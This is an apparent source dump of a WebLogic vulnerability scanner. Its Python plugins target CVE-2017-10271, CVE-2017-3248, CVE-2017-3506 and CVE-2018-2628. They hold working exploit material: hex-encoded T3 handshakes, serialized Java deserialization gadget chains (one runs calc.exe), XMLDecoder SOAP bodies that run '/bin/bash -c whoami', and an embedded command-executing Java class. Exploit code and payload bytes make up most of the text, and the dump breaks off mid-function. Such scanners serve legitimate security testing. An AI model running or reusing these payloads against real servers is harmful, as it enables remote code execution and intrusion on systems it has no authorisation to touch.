'000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' 33 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port)) 34 | data3 = '1a7727000d3234322e323134' 35 | data4 = '2e312e32353461863d1d0000000078' 36 | for d in [data1,data2,data3,data4]: 37 | sock.send(bytes.fromhex(d)) 38 | time.sleep(2) 39 | 40 | def sendEvilObjData(self,sock,data): 41 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' 42 | payload+=data 43 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 44 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload) 45 | sock.send(bytes.fromhex(payload)) 46 | res = '' 47 | try: 48 | while True: 49 | res += sock.recv(4096).decode('utf-8','ignore') 50 | time.sleep(0.1) 51 | except Exception: 52 | pass 53 | return res 54 | def checkVul(self,res,index): 55 | p=re.findall(VER_SIG[index], res, re.S) 56 | if len(p)>0: 57 | logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])) 58 | print(Color.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])+Color.ENDC) 59 | print(Color.OKGREEN+'[+]CVE-2016-3510 漏洞存在'+Color.ENDC) 60 | else: 61 | logging.info('[-]Target weblogic not detected {}'.format(VUL[index])) 62 | print(Color.FAIL+'[-]Target weblogic not detected {}'.format(VUL[index])+Color.ENDC) 63 | 64 | def run(self,ip,port,index): 65 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 66 | sock.settimeout(5) 67 | server_addr = (ip, port) 68 | self.t3handshake(sock,server_addr) 69 | self.buildT3RequestObject(sock,port) 70 | rs=self.sendEvilObjData(sock,PAYLOAD[index]) 71 | self.checkVul(rs,index) 72 | -------------------------------------------------------------------------------- /app/plugins/CVE-2017-10271.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import requests 5 | import re 6 | import logging 7 | 8 | 9 | from ..platform import ManageProcessor,Color 10 | 11 | logging.basicConfig(filename='Weblogic.log', 12 | format='%(asctime)s %(message)s', 13 | filemode="w", level=logging.INFO) 14 | 15 | VUL='CVE-2017-10271' 16 | index=1 17 | headers = {'user-agent': 'ceshi/0.0.1','content-type': 'text/xml',} 18 | poc_str = ''' 19 | 20 | 21 | 22 | 23 | 0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034 24 | 25 | 26 | 27 | com.supeream.exploits.XmlExp 28 | 29 | 30 | 31 | echo UjFhbmRyMG9wCg== | base64 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | ''' 54 | 55 | 56 | @ManageProcessor.plugin_register('CVE201710271') 57 | class CVE201710271(object): 58 | def process(self,ip,port): 59 | self.run(ip,port) 60 | 61 | def poc(self,url): 62 | if not url.startswith("http"): 63 | url = "http://" + url 64 | if "/" in url: 65 | url += '/wls-wsat/CoordinatorPortType' 66 | try: 67 | res = requests.post(url, data=poc_str, verify=False, timeout=5, headers=headers) 68 | response = res.text 69 | #response = re.search(r"\.*\<\/faultstring\>", response).group(0) 70 | except Exception: 71 | response = "" 72 | 73 | #if 'java.lang.ProcessBuilder' in response or "0" in response: 74 | if 'VWpGaGJtUnlNRzl3Q2c9PQo=' in response: 75 | logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL)) 76 | print(Color.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL)+Color.ENDC) 77 | print(Color.OKGREEN+'[+]CVE-2017-10271 漏洞存在'+Color.ENDC) 78 | else: 79 | logging.info('[-]Target weblogic not detected {}'.format(VUL)) 80 | print(Color.FAIL+'[-]Target weblogic not detected {}'.format(VUL)+Color.ENDC) 81 | def run(self,ip,port): 82 | url=ip+':'+str(port) 83 | self.poc(url=url) 84 | 85 | 86 | 87 | 88 | -------------------------------------------------------------------------------- /app/plugins/CVE-2017-3248.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import logging 5 | import socket 6 | import sys 7 | import time 8 | import re 9 | 10 | from ..platform import ManageProcessor,Color 11 | 12 | 13 | logging.basicConfig(filename='Weblogic.log', 14 | format='%(asctime)s %(message)s', 15 | filemode="w", level=logging.INFO) 16 | 17 | VUL=['CVE-2017-3248'] 18 | PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78','aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078'] 19 | VER_SIG=['\\$Proxy[0-9]+'] 20 | 21 | @ManageProcessor.plugin_register('CVE20173248') 22 | class CVE20173248(object): 23 | def process(self,ip,port): 24 | self.run(ip,port,0) 25 | 26 | def t3handshake(self,sock,server_addr): 27 | sock.connect(server_addr) 28 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 29 | time.sleep(1) 30 | sock.recv(1024) 31 | 32 | def buildT3RequestObject(self,sock,port): 33 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' 34 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port)) 35 | data3 = '1a7727000d3234322e323134' 36 | data4 = '2e312e32353461863d1d0000000078' 37 | for d in [data1,data2,data3,data4]: 38 | sock.send(bytes.fromhex(d)) 39 | time.sleep(2) 40 | 41 | def sendEvilObjData(self,sock,data): 42 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' 43 | payload+=data 44 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 45 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload) 46 | sock.send(bytes.fromhex(payload)) 47 | res = '' 48 | try: 49 | while True: 50 | res += sock.recv(4096).decode('utf-8','ignore') 51 | time.sleep(0.1) 52 | except Exception: 53 | pass 54 | return res 55 | def checkVul(self,res,index): 56 | p=re.findall(VER_SIG[index], res, re.S) 57 | if len(p)>0: 58 | logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])) 59 | print(Color.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])+Color.ENDC) 60 | print(Color.OKGREEN+'[+]CVE-2017-3248 漏洞存在'+Color.ENDC) 61 | else: 62 | logging.info('[-]Target weblogic not detected {}'.format(VUL[index])) 63 | print(Color.FAIL+'[-]Target weblogic not detected {}'.format(VUL[index])+Color.ENDC) 64 | 65 | def run(self,ip,port,index): 66 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 67 | sock.settimeout(5) 68 | server_addr = (ip, port) 69 | self.t3handshake(sock,server_addr) 70 | self.buildT3RequestObject(sock,port) 71 | rs=self.sendEvilObjData(sock,PAYLOAD[index]) 72 | self.checkVul(rs,index) 73 | -------------------------------------------------------------------------------- /app/plugins/CVE-2017-3506.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import sys 5 | import requests 6 | import re 7 | import logging 8 | 9 | from ..platform import ManageProcessor,Color 10 | 11 | logging.basicConfig(filename='Weblogic.log', 12 | format='%(asctime)s %(message)s', 13 | filemode="w", level=logging.INFO) 14 | 15 | VUL=['CVE-2017-3506'] 16 | headers = {'user-agent': 'ceshi/0.0.1','content-type': 'text/xml'} 17 | 18 | poc_str = ''' 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | /bin/bash 27 | 28 | 29 | -c 30 | 31 | 32 | whoami 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | ''' 43 | 44 | 45 | @ManageProcessor.plugin_register('CVE20173506') 46 | class CVE20173506(object): 47 | def process(self,ip,port): 48 | self.run(ip,port,0) 49 | 50 | def poc(self,url,index): 51 | if not url.startswith("http"): 52 | url = "http://" + url 53 | if "/" in url: 54 | url += '/wls-wsat/CoordinatorPortType' 55 | 56 | try: 57 | response = requests.post(url, data=poc_str, verify=False, timeout=5, headers=headers) 58 | response = response.text 59 | response = re.search(r"\.*\<\/faultstring\>", response).group(0) 60 | except Exception: 61 | response = "" 62 | 63 | if 'java.lang.ProcessBuilder' in response or "0" in response: 64 | logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])) 65 | print(Color.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])+Color.ENDC) 66 | print(Color.OKGREEN+'[+]CVE-2017-3506 漏洞存在'+Color.ENDC) 67 | else: 68 | logging.info('[-]Target weblogic not detected {}'.format(VUL[index])) 69 | print(Color.FAIL+'[-]Target weblogic not detected {}'.format(VUL[index])+Color.ENDC) 70 | 71 | 72 | def run(self,rip,rport,index): 73 | url=rip+':'+str(rport) 74 | self.poc(url=url,index=index) 75 | -------------------------------------------------------------------------------- /app/plugins/CVE-2018-2628.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import socket 5 | import sys 6 | import time 7 | import re 8 | import logging 9 | 10 | from ..platform import ManageProcessor,Color 11 | 12 | logging.basicConfig(filename='Weblogic.log', 13 | format='%(asctime)s %(message)s', 14 | filemode="w", level=logging.INFO) 15 | 16 | 17 | VUL=['CVE-2018-2628'] 18 | PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078'] 19 | VER_SIG=['\\$Proxy[0-9]+'] 20 | 21 | 22 | @ManageProcessor.plugin_register('CVE20182628') 23 | class CVE20182628(object): 24 | def process(self,ip,port): 25 | self.run(ip,port,0) 26 | 27 | def t3handshake(self,sock,server_addr): 28 | sock.connect(server_addr) 29 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 30 | time.sleep(1) 31 | sock.recv(1024) 32 | 33 | def buildT3RequestObject(self,sock,port): 34 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' 35 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port)) 36 | data3 = '1a7727000d3234322e323134' 37 | data4 = '2e312e32353461863d1d0000000078' 38 | for d in [data1,data2,data3,data4]: 39 | sock.send(bytes.fromhex(d)) 40 | time.sleep(2) 41 | 42 | 43 | def sendEvilObjData(self,sock,data): 44 | 